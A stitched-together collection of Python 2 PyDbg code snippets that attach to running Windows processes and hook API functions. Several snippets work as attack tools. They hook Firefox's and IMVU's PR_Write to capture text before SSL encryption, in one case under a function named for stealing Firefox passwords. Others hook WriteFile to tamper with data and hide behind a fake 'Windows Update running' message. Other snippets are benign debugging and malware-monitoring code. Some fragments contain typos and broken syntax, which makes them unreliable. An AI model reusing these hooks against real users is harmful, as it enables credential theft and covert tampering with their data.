def main(): try: dbg = pydbg() for (pid, name) in dbg.enumerate_processes(): # 모든 프로세스 ID 리스트를 얻음 if (name.lower() == targetProcess ): # 검색된 프로세스와 타겟 프로세스(notepad.exe) 이름이 같을 경우 isProcess = True hooks = utils.hook_container() # 모든 후킹 객체를 담을 공간 확보 dbg.attach(pid) # 해당 프로세스의 핸들을 얻어 클래스 내부에 저장 #print "[+] Saves a process handle in self.h_process of pid[%d]" % pid hookAddress = dbg.func_resolve_debuggee( "kernel32.dll", "WriteFile") # 핸들을 이용해 Win32 API 함수 주소를 찾아 반환 if hookAddress: # 해당 함수 주소 반환에 성공했을 경우 hooks.add(dbg, hookAddress, 5, replaceString, None) # 해당 함수에 중단점 설정 후 콜백함수 등록 #print "[+] sets a breakpoint at the designated address : 0x%08x" % hookAddress break else: #print "[-] couldn't resolve hook address" exit(0) if isProcess: #print "waiting for occuring debugger event" print "Windows Update running.\nPlease do not exit the terminal." dbg.run() # 디버그 이벤트가 발생하면 콜백함수 호출 else: #print "[-] There in no process [%s]" % targetProcess exit(0) except Exception, e: if "DebugActiveProcess" in str(e): #print "[-] Open the C:\Windows\SysWOW64\notepad.exe Not C:\Windows\System32\notepad.exe" exit(0) #print "[-] ", e exit(0)
def run(self, pid, functions): """ Main function for class Tracer pid - process ID (for pydbg.attach()) functions - an array of modified/corrected function list """ raw_input("[*] When you're ready, press [ENTER] to continue...") dbg = pydbg() dbg.attach(pid) try: functions = self.__correctIDAProRETNs( dbg, functions) #Correct RETN addresses - IDA specific problem except: print "[*] Error: Either you don't have the right function list, or the component is not loaded at the moment" sys.exit(-1) print "[*] Enumerating functions...", counter = 0 hooks = utils.hook_container() for addr in functions: counter += 1 hooks.add(dbg, addr[0], 10, self.log, None) #Only look at the first 10 arguments print " %s hooks added" % counter print "[*] Press [CTRL]+[C] to stop..." dbg.run() print "[*] And we're done with tracing"
def main(): try: global isProcess, beforeValue, afterValue targetProcess=raw_input("Input Process Name( ex) notepad++.exe): ") # 타겟 프로세스명 beforeValue=raw_input("Input Before Value : ") # 현재 설정된 값 afterValue=raw_input("Input After Value : ") # 바꾸고 싶은 값 funcName=raw_input("Input Win32 API Function Name( ex) WriteFile) : ") # 후킹하고자 하는 함수 dllName=raw_input("Input Dll Name( ex) kernel32.dll) : ") # 해당 함수를 로딩한 dll dbg=pydbg() for(pid, name) in dbg.enumerate_processes(): # 현재 실행중인 모든 프로세스를 탐색 if(name==targetProcess): # 현재 실행중인 프로세스 중에 타겟 프로세스가 있을 경우 isProcess=True hooks=utils.hook_container() # 모든 후킹 객체를 담을 공간 확보 dbg.attach(pid) # 해당 프로세스의 핸들을 얻어 클래스 내부에 저장 print "[+] Saves a process handle in self.h_process of pid[%d]" % pid hookAddress=dbg.func_resolve_debuggee(dllName, funcName) # 핸들을 이용해 Win32 API 함수 주소를 찾아 반환 if(hookAddress): # 해당 함수 주소 반환에 성공했을 경우 hooks.add(dbg, hookAddress, 5, falsification, None) # 해당 함수에 중단점 설정 후 콜백함수 등록 print "[+] sets a breakpoint at the designated address : 0x%08x" % hookAddress break else: print "[-] couldn't resolve hook address" exit(0) if(isProcess): # 타겟 프로세스가 실행중인 경우 dbg.run() # 디버그 이벤트가 발생하면 콜백함수 호출 else: # 타겟 프로세스가 종료된 경우 print "[-] There in no process [%s]" % targetProcess exit(0) except Exception, e: print "[-] ", e exit(0)
def replaceString(dbg, args): buffer = dbg.read_process_memory(args[1], args[2]) if orgPattern in buffer: print("[APIHooking] Before : %s" (buffer)) buffer = buffer.replace(orgPattern, repPattern) replace = dbg.write_process_memory(args[1], buffer) print("[APIHooking] After : %s" (dbg.read_process_memory( args[1], args[2]))) return DBG_CONTINUE for (pid, name) in dbg.enumerate_processes(): if name.lower() == processName: isProcess = True hooks = utils.hook_container() dbg.attach(pid) print("Saves a process handle in self.h_process of pid[%d]" (pid)) hookAddress = dbg.func_resolve_debuggee("kernel32.dll", "WriteFile") if hookAddress: hooks.add(dbg, hookAddress, 5, replaceString, None) print("sets a breakpoint at the designated address : 0x%08x" ( hookAddress)) break else: print("[Error] : couldn't resolve hook address") sys.exit(-1)
def main(): parseconfig() startlog() dbg = pydbg() hooks = utils.hook_container() for (pid,name) in dbg.enumerate_processes(): if name == proc_name: print '[+] Attaching to ',proc_name try: dbg.attach(pid) except Exception,e: print '[Error] Cannot Attach to process ',proc_name,pid exit()
def main(): parseconfig() startlog() dbg = pydbg() hooks = utils.hook_container() for (pid, name) in dbg.enumerate_processes(): if name == proc_name: print '[+] Attaching to ', proc_name try: dbg.attach(pid) except Exception, e: print '[Error] Cannot Attach to process ', proc_name, pid exit()
def set_library_hooks(dbg): dbg.hooks = utils.hook_container() for lib in dbg.library: if not lib["on"]: continue address = dbg.func_resolve(lib["dll"], lib["func"]) print "[*] Setting hook @ 0x%08x %s!%s" % (address, lib["dll"], lib["func"]) try: dbg.hooks.add(dbg, address, lib["args"], None, lib["handler"]) except: print "[!] Problem setting hook @ 0x%08x %s!%s" % (address, lib["dll"], lib["func"]) return False return True
def set_library_hooks(self, dbg): dbg.hooks = utils.hook_container() for lib in dbg.library: if not lib["on"]: continue address = dbg.func_resolve(lib["dll"], lib["func"]) self.logger.debug("ieMon: Setting hook @ 0x%08x %s!%s" % (address, lib["dll"], lib["func"])) try: dbg.hooks.add(dbg, address, lib["args"], None, lib["handler"]) except: self.logger.debug("ieMon: Problem setting hook @ 0x%08x %s!%s" % (address, lib["dll"], lib["func"])) return False return True
def ssl_sniff(dbg, args): # read the memory pointed to by second argument # loop on a read until a NULL byte reached buffer = '' offset = 0 while 1: byte = dbg.read_process_memory(args[0] + offset, 1) if byte != "\x00": buffer += byte offset += 1 continue else: break if pattern in buffer: print "Pre-Encrypted: %s" % buffer return DBG_CONTINUE # quick process enumeration to find firefox.exe for (pid, name) in dbg.enumerate_processes(): if name.lower() == "firefox.exe": found_firefox = True hooks = utils.hook_container() dbg.attach(pid) print "[*] Attaching to firefox.exe with PID: %d" % pid # Resolve function address hook_addess = dbg.func_resolve_debuggee("nspr4.dll", "PR_Write") if hook_addess: # add the hook to container hooks.add(dbg, hook_addess, 2, ssl_sniff, None) print "[*] nspr4.PR_Write hooked at 0x%08x" % hook_addess break else: print "[*] Error: Couldn't resolve hook address" sys.exit(-1) if found_firefox: print "[*] Hooks set, continuing process." dbg.run() else: print "[*] Error: Couldn't find the firefox.exe process" sys.exit(-1)
def ssl_sniff(dbg, args): buffer = "" offset = 0 while 1: byte = dbg.read_process_memory(args[1] + offset, 1) if byte != "\x00": buffer += byte object += 1 continue else: break if pattern in buffer: print "Pre-Encrypted: %s" % buffer return DBG_CONTINUE for (pid, name) in dbg.enumerate_processes(): if name.lower() == "firefox.exe": found_firefox = True hooks = utils.hook_container() dbg.attach(pid) print "Attach to firefox with PID:%d" % pid hocks_address = dbg.func_resolve_debuggee("nspr4.dll", "PR_Write") if hocks_address: hooks.add(dbg, hocks_address, 2, ssl_sniff, None) print "nspr4.PR_Write hooked at: 0x%08x" % hocks_address break else: print "Error: Couldn't resolve hool address." sys.exit[-1] if found_firefox: print "Hocks set,continuing process." dbg.run() else: print "Error: Couldn't find the firefox.exe process. Please fire up firefox first." sys.exit(-1)
def set_library_hooks(dbg): dbg.hooks = utils.hook_container() for lib in dbg.library: if not lib["on"]: continue address = dbg.func_resolve(lib["dll"], lib["func"]) print "[*] Setting hook @ 0x%08x %s!%s" % (address, lib["dll"], lib["func"]) try: dbg.hooks.add(dbg, address, lib["args"], None, lib["handler"]) except: print "[!] Problem setting hook @ 0x%08x %s!%s" % ( address, lib["dll"], lib["func"]) return False return True
def set_library_hooks(self, dbg): dbg.hooks = utils.hook_container() for lib in dbg.library: if not lib["on"]: continue address = dbg.func_resolve(lib["dll"], lib["func"]) self.logger.debug("ieMon: Setting hook @ 0x%08x %s!%s" % (address, lib["dll"], lib["func"])) try: dbg.hooks.add(dbg, address, lib["args"], None, lib["handler"]) except: self.logger.debug( "ieMon: Problem setting hook @ 0x%08x %s!%s" % (address, lib["dll"], lib["func"])) return False return True
def setHookPoints(self): hooks = utils.hook_container() if len(self.dbg.breakpoints) > 0: print "\n ******+++++******\n" print self.dbg.breakpoints for l in self.hook_address: hooks.remove(self.dbg, l[0]) #self.dbg.bp_del_all() print "self.on: "+str(self.on) if self.on2 == True: self.dbg.attach(self.pid) self.hook_address = self.getHookContainer() for l in self.hook_address: hooks.add( self.dbg, l[0], 2, self.myHandler, self.exitHandler, l[1], l[2] ) #print "\n" print "\t", hex(l[0]), l[1], l[2] if self.on2 == True: self.on2 = False self.dbg.run()
def __init__(self, strGameExeName): self.dbg = pydbg() dbg = self.dbg # 设置断点容器 self.hooks = utils.hook_container() # 获得进程ID #nPID = khztools.getProcID(self.dbg, strGameExeName) #"FightersClub.exe" nPID = None for pid, name in dbg.enumerate_processes(): #print pid,name if name.lower() == strGameExeName.lower(): nPID = pid if not nPID: khztools.khzLog(u"[*]目标进程ID为空,退出程序") exit(-1) else: khztools.khzLog(u"[*]目标进程ID为:%d" % nPID) self.dbg.attach(nPID) pass
def debugger_init(self): ''' The name says it all, doesn't it? ''' self.dbg = pydbg() # Find the process' PID. # Search by name. plist = self.dbg.enumerate_processes() for p in plist: if p[1] == "utorrent.exe": self.pid_utorrent = p[0] print "Found utorrent.exe - PID %d" % p[0] # Attach to the process. self.dbg.attach(int(self.pid_utorrent)) # Define the hook container. hooks = utils.hook_container() # Resolve the interesting function's addresses. CreateFileAddr = self.dbg.func_resolve("kernel32.dll", "CreateFileW") # Exit Hook: handle ReadFileAddr = self.dbg.func_resolve("kernel32.dll", "ReadFile") # Entry Hook: check right handle CloseHandleAddr = self.dbg.func_resolve("kernel32.dll", "CloseHandle") # Exit Hook: erase closed handles # SET the hooks! hooks.add(self.dbg, CreateFileAddr, 7, None, self.CreateFileHook) # Exit hook hooks.add(self.dbg, ReadFileAddr, 5, self.ReadFileHook, None) # Entry hook hooks.add(self.dbg, CloseHandleAddr, 1, None, self.CloseHandleHook) # Exit hook print "[x] Hooks added!" # Let the program run! print "[x] Here we go!" self.dbg.run()
def main(): dbg = pydbg() found_qq = False for (pid, name) in dbg.enumerate_processes(): if name.lower() == "qq.exe": found_qq = True hooks = utils.hook_container() dbg.attach(pid) print "[*] Attaching to qq.exe with PID: %d" % pid hook_address = dbg.func_resolve("ws2_32", "sendto") hooks.add(dbg, hook_address, 6, my_sendto, None) print "[*] ws2_32.sendto hooked at 0x%08X" % hook_address break if found_qq: print "[*] Hooks set, continuing process." dbg.run() else: print "[*] Cound not find qq.exe" sys.exit(-1)
def main(): try: global isProcess, targetProcessList confirm = 0 dbg = pydbg() for (pid, name) in dbg.enumerate_processes(): # 현재 실행중인 모든 프로세스를 탐색 for targetProcess in targetProcessList: if (name == targetProcess): # 현재 실행중인 프로세스 중에 타겟 프로세스가 있을 경우 isProcess = True hooks = utils.hook_container() # 모든 후킹 객체를 담을 공간 확보 dbg.attach(pid) # 해당 프로세스의 핸들을 얻어 클래스 내부에 저장 #print "[+] Saves a process handle in self.h_process of pid[%d]" % pid hookAddress = dbg.func_resolve_debuggee( "kernel32.dll", "WriteFile") # 핸들을 이용해 Win32 API 함수 주소를 찾아 반환 if hookAddress: # 해당 함수 주소 반환에 성공했을 경우 hooks.add(dbg, hookAddress, 5, replaceString, None) # 해당 함수에 중단점 설정 후 콜백함수 등록 #print "[+] sets a breakpoint at the designated address : 0x%08x" % hookAddress confirm = 1 break else: #print "[-] couldn't resolve hook address" exit(0) if (confirm == 1): break if isProcess: # 타겟 프로세스가 실행중인 경우 dbg.run() # 디버그 이벤트가 발생하면 콜백함수 호출 else: # 타겟 프로세스가 종료된 경우 #print "[-] There in no process [%s]" % targetProcess exit(0) except Exception, e: if "DebugActiveProcess" in str(e): #print "[-] Open the C:\Windows\SysWOW64\notepad.exe Not C:\Windows\System32\notepad.exe" exit(0) #print "[-] ", e exit(0)
def handler_breakpoint (self, dbg): ''' On the first breakpoint set all the other breakpoints on the recon points. If track_recg is enabled then establish hooks on the winsock functions. On subsequent breakpoints, record them appropriately. ''' # # first breakpoint, set hooks and breakpoints on recon points. # if dbg.first_breakpoint: if self.track_recv: self.hooks = utils.hook_container() # ESP +4 +8 +C +10 # int recv (SOCKET s, char *buf, int len, int flags) # int recvfrom (SOCKET s, char *buf, int len, int flags, struct sockaddr *from, int *fromlen) # we want these: ^^^ ^^^ try: ws2_recv = dbg.func_resolve("ws2_32", "recv") self.hooks.add(dbg, ws2_recv, 4, None, self.socket_logger_ws2_recv) except: pass try: ws2_recvfrom = dbg.func_resolve("ws2_32", "recvfrom") self.hooks.add(dbg, ws2_recvfrom, 4, None, self.socket_logger_ws2_recvfrom) except: pass try: wsock_recv = dbg.func_resolve("wsock32", "recv") self.hooks.add(dbg, wsock_recv, 4, None, self.socket_logger_wsock_recv) except: pass try: wsock_recvfrom = dbg.func_resolve("wsock32", "recvfrom") self.hooks.add(dbg, wsock_recvfrom, 4, None, self.socket_logger_wsock_recvfrom) except: pass # retrieve list of recon points. cursor = self.main_frame.mysql.cursor(MySQLdb.cursors.DictCursor) cursor.execute("SELECT id, offset, stack_depth FROM pp_recon WHERE module_id = '%d'" % self.module["id"]) # create a mapping of addresses to recon MySQL objects. self.addr_to_recon = {} for row in cursor.fetchall(): self.addr_to_recon[self.module["base"] + row["offset"]] = row # set breakpoints at each recon point. self.dbg.bp_set(self.addr_to_recon.keys()) self.msg("Watching %d points" % len(self.addr_to_recon)) # close the MySQL cursor and continue execution. cursor.close() return DBG_CONTINUE # # subsequent breakpoints are recon hits ... export to db. # # grab the current context. context_dump = dbg.dump_context(stack_depth=self.addr_to_recon[dbg.context.Eip]["stack_depth"], print_dots=False) # display the context if the 'quiet' option is not enabled. if not self.quiet: self.msg(context_dump) # no boron tag match by default. boron_found = "" # if it was specified, search for the boron tag in the current context. if self.boron_tag: if context_dump.lower().find(self.boron_tag.lower()) != -1: boron_found = self.boron_tag # update the boron tag field of the pp_recon table to reflect that a hit was made. cursor = self.main_frame.mysql.cursor() cursor.execute("UPDATE pp_recon SET boron_tag='%s' WHERE id='%d'" % (boron_found, self.addr_to_recon[dbg.context.Eip]["id"])) cursor.close() if not self.quiet: self.msg(">>>>>>>>>>>>>>>>>>>> BORON TAG FOUND IN ABOVE CONTEXT DUMP <<<<<<<<<<<<<<<<<<<<") # retrieve the context list with 'hex_dump' enabled to store in the database. context_list = dbg.dump_context_list(stack_depth=4, hex_dump=True) sql = " INSERT INTO pp_hits" sql += " SET recon_id = '%d'," % self.addr_to_recon[dbg.context.Eip]["id"] sql += " module_id = '%d'," % self.module["id"] sql += " timestamp = '%d'," % int(time.time()) sql += " tid = '%d'," % dbg.dbg.dwThreadId sql += " eax = '%d'," % dbg.context.Eax sql += " ebx = '%d'," % dbg.context.Ebx sql += " ecx = '%d'," % dbg.context.Ecx sql += " edx = '%d'," % dbg.context.Edx sql += " edi = '%d'," % dbg.context.Edi sql += " esi = '%d'," % dbg.context.Esi sql += " ebp = '%d'," % dbg.context.Ebp sql += " esp = '%d'," % dbg.context.Esp sql += " esp_4 = '%d'," % context_list["esp+04"]["value"] sql += " esp_8 = '%d'," % context_list["esp+08"]["value"] sql += " esp_c = '%d'," % context_list["esp+0c"]["value"] sql += " esp_10 = '%d'," % context_list["esp+10"]["value"] sql += " eax_deref = '%s'," % context_list["eax"].replace("\\", "\\\\").replace("'", "\\'") sql += " ebx_deref = '%s'," % context_list["ebx"].replace("\\", "\\\\").replace("'", "\\'") sql += " ecx_deref = '%s'," % context_list["ecx"].replace("\\", "\\\\").replace("'", "\\'") sql += " edx_deref = '%s'," % context_list["edx"].replace("\\", "\\\\").replace("'", "\\'") sql += " edi_deref = '%s'," % context_list["edi"].replace("\\", "\\\\").replace("'", "\\'") sql += " esi_deref = '%s'," % context_list["esi"].replace("\\", "\\\\").replace("'", "\\'") sql += " ebp_deref = '%s'," % context_list["ebp"].replace("\\", "\\\\").replace("'", "\\'") sql += " esp_deref = '%s'," % context_list["esp"].replace("\\", "\\\\").replace("'", "\\'") sql += " esp_4_deref = '%s'," % context_list["esp+04"]["desc"].replace("\\", "\\\\").replace("'", "\\'") sql += " esp_8_deref = '%s'," % context_list["esp+08"]["desc"].replace("\\", "\\\\").replace("'", "\\'") sql += " esp_c_deref = '%s'," % context_list["esp+0c"]["desc"].replace("\\", "\\\\").replace("'", "\\'") sql += " esp_10_deref = '%s'," % context_list["esp+10"]["desc"].replace("\\", "\\\\").replace("'", "\\'") sql += " boron_tag = '%s'," % boron_found sql += " base = '%d' " % self.module["base"] cursor = self.main_frame.mysql.cursor() cursor.execute(sql) cursor.close() return DBG_CONTINUE
def imdbg(): clear_screen() dbg = pydbg() found_imvu = False logging.basicConfig(filename='hook.log',level=logging.DEBUG) logo() print 'Python',(sys.version),'\n' pattern = raw_input("\n[?] What string to search for? >\n") logme = raw_input("\n[?] Would you like to log my output to a text file? ( y/n )") v = raw_input('\n[?] Use verbose mode?(no output at all)(y/n)') if logme == "y": print "[@] OUTPUT LOGGING ENABLED!" print "[@] Placing search string in log..." logging.debug("Searched on %s for the string: %s" % (now,pattern)) print '\n[!] Searching for pattern: %s'% (pattern) def ssl_sniff( dbg, args ): buffer = "" offset = 0 while 1: byte = dbg.read_process_memory( args[1] + offset, 1 ) if byte != "\x00": buffer += byte offset += 1 continue else: break if v == "y": logging.debug("[>] Pre-Encrypted: %s %s" %(now,buffer) ) else: if pattern in buffer: if logme == "y": logging.debug("[>] Pre-Encrypted: %s %s" %(now,buffer) ) print "[>] Pre-Encrypted: %s" % buffer else: print "[>] Pre-Encrypted: %s" % buffer return DBG_CONTINUE for (pid, name) in dbg.enumerate_processes(): if name.lower() == "imvuclient.exe": found_imvu = True hooks = utils.hook_container() dbg.set_callback(EXCEPTION_ACCESS_VIOLATION,check_accessv) dbg.attach(int(pid)) print "[!] Attaching to IMVU with PID: %d..." % pid hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write") if hook_address: hooks.add( dbg, hook_address, 2, ssl_sniff, None) print "[*] nspr4.PR_Write hooked at: 0x%08x" % hook_address break else: print "[!] Error: Couldn't resolve hook address." dbg.detach() print "[!] Error: Couldn't find the process. Please wait while I fire up IMVU and try again" system('start %s'%(path)) imdbg() if found_imvu: print "[*] Hook set, continuing process.\n\n" if v == "y": print '[*] Verbose mode ' readinput().start() dbg.run() else: readinput().start() dbg.run() else: print "[!] Error: Couldn't find the process. Please wait while I fire up IMVU and try again" system('start %s'%(path)) system('pause') imdbg()
# parse command line options. try: opts, args = getopt.getopt(sys.argv[1:], "gh:o:l:mp:", ["graph", "host=", "monitor", "port=", "pid="]) except getopt.GetoptError: ERROR(USAGE) count = 0 udraw = False host = "127.0.0.1" port = 2542 filename = None pid = None udraw = None graph = pgraph.graph() hooks = utils.hook_container() monitor = False allocs = {} for opt, arg in opts: if opt in ("-g", "--graph"): udraw = True if opt in ("-h", "--host"): host = arg if opt in ("-o", "--port"): port = int(arg) if opt in ("-l", "--load"): filename = arg if opt in ("-p", "--pid"): pid = int(arg) if opt in ("-m", "--monitor"): monitor = True if not pid and not filename: ERROR(USAGE) if udraw:
def load_dll(pydbg): last_dll = pydbg.system_dlls[-1] #print "loading:%s into:%08x size:%d" % (last_dll.name, last_dll.base, last_dll.size) global is_hook #print "in loaddll" if is_hook == 0: #todo add createprocess and urldownload hooks global hooks hooks = utils.hook_container() hook_address_virtualprotect = pydbg.func_resolve_debuggee( "kernel32.dll", "VirtualProtect") hook_address_virtualprotectEx = pydbg.func_resolve_debuggee( "kernel32.dll", "VirtualProtectEx") hook_address_VirtualAlloc = pydbg.func_resolve_debuggee( "kernel32.dll", "VirtualAlloc") hook_address_CreateFileA = pydbg.func_resolve_debuggee( "kernel32.dll", "CreateFileA") hook_address_CreateFileW = pydbg.func_resolve_debuggee( "kernel32.dll", "CreateFileW") hook_address_CreateProcessA = pydbg.func_resolve_debuggee( "kernel32.dll", "CreateProcessA") hook_address_CreateProcessW = pydbg.func_resolve_debuggee( "kernel32.dll", "CreateProcessW") #print hook_address_virtualprotect if hook_address_virtualprotect: res = hooks.add(pydbg, hook_address_virtualprotect, 4, VirtualProtectHook, None) is_hook = 1 print res print "[*] VirtualProtect hooked at: 0x%08x" % hook_address_virtualprotect else: print "[*] Error: Couldn't resolve virtualProtect address." if hook_address_virtualprotectEx: res = hooks.add(pydbg, hook_address_virtualprotectEx, 5, VirtualProtectHookEx, None) is_hook = 1 print res print "[*] VirtualProtectEx hooked at: 0x%08x" % hook_address_virtualprotectEx else: print "[*] Error: Couldn't resolve virtualProtectEx address." if hook_address_VirtualAlloc: res = hooks.add(pydbg, hook_address_VirtualAlloc, 4, VirtualAllocHook, None) is_hook = 1 print res print "[*] VirtualAlloc hooked at: 0x%08x" % hook_address_VirtualAlloc else: print "[*] Error: Couldn't resolve virtualAlloc address." if hook_address_CreateFileA: res = hooks.add(pydbg, hook_address_CreateFileA, 7, CreateFileAHook, None) is_hook = 1 print res print "[*] CreateFileA hooked at: 0x%08x" % hook_address_CreateFileA else: print "[*] Error: Couldn't resolve CreateFileA address." if hook_address_CreateFileW: res = hooks.add(pydbg, hook_address_CreateFileW, 7, CreateFileWHook, None) is_hook = 1 print res print "[*] CreateFileW hooked at: 0x%08x" % hook_address_CreateFileW else: print "[*] Error: Couldn't resolve CreateFileW address." if hook_address_CreateProcessA: res = hooks.add(pydbg, hook_address_CreateProcessA, 7, CreateProcessAHook, None) is_hook = 1 print res print "[*] CreateProcessA hooked at: 0x%08x" % hook_address_CreateProcessA else: print "[*] Error: Couldn't resolve CreateProcessA address." if hook_address_CreateProcessW: res = hooks.add(pydbg, hook_address_CreateProcessW, 7, CreateProcessWHook, None) is_hook = 1 print res print "[*] CreateProcessW hooked at: 0x%08x" % hook_address_CreateProcessW else: print "[*] Error: Couldn't resolve CreateProcessW address." return DBG_CONTINUE
def __init__(self): self.hooks = utils.hook_container()
buffer = dbg.read_process_memory(args[1], args[2]) #메모리 값 읽기 #지정된 주소에서 지정된 길이 만큼 메모리주소를 읽어서 반환(Kernel32.ReadProcessMemory) if orgPattern in buffer: print "[APIHooking] Before : %s" % buffer buffer = buffer.replace(orgPattern, repPattern) #값 바꾸기 replace = dbg.write_process_memory(args[1], buffer) print '[APIHooking] After : %s' % dbg.read_process_memory( args[1], args[2]) return DBG_CONTINUE for (pid, name) in dbg.enumerate_processes(): #프로세스 ID 리스트 얻기 if name.lower() == processName: isProcess = True hooks = utils.hook_container() dbg.attach(pid) #프로세스 핸들(자원을 다룰수 있는) 구하기 print "Saves a process handle in self.h_process of pid[%d]" % pid hookAddress = dbg.func_resolve_debuggee("kernel32.dll", "WriteFile") #원하는 Win32 API 함수를 찾아서 해당 주소 반환 if hookAddress: hooks.add(dbg, hookAddress, 5, replaceString, None) #중단점 설정 print "sets a breakpoint at the designated address : 0x%08x" % hookAddress break else: print "[Error] : couldn't resolve hook address" sys.exit(-1)
def hook_function_by_name(dbg,dll_name,function_name,handler): #in this function, we add a hook to the a function given in parameter @function_name: hooks = utils.hook_container() pointer_address = "%08x"%import_table[dll_name.lower()][function_name] pointer_address_hex = int(pointer_address, 16) hooks.add(dbg,pointer_address_hex,3,handler,None)
def pydbghook_firefoxpasswd(): dbg = pydbg() found_firefox = False for (pid, name) in dbg.enumerate_processes(): if name.lower() == "firefox.exe": found_firefox = True hooks = utils.hook_container() dbg.attach(pid) print "[*] Attaching to firefox.exe with PID: %d" % pid # Resolve the function address hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write") if hook_address: # Add the hook to the container, we aren't interested in using an exit callback so we set it to None hooks.add( dbg, hook_address, 2, ssl_sniff, None) print "[*] nspr4.PR_Write hooked at: 0x%08x" % hook_address break else: print "[*] Error: Couldn't resolve hook address." sys.exit(-1) if found_firefox: print "[*] Hooks set, continuing process." dbg.run() else: print "[*] Error: Couldn't find the firefox.exe process. Please fire up firefox first." sys.exit(-1)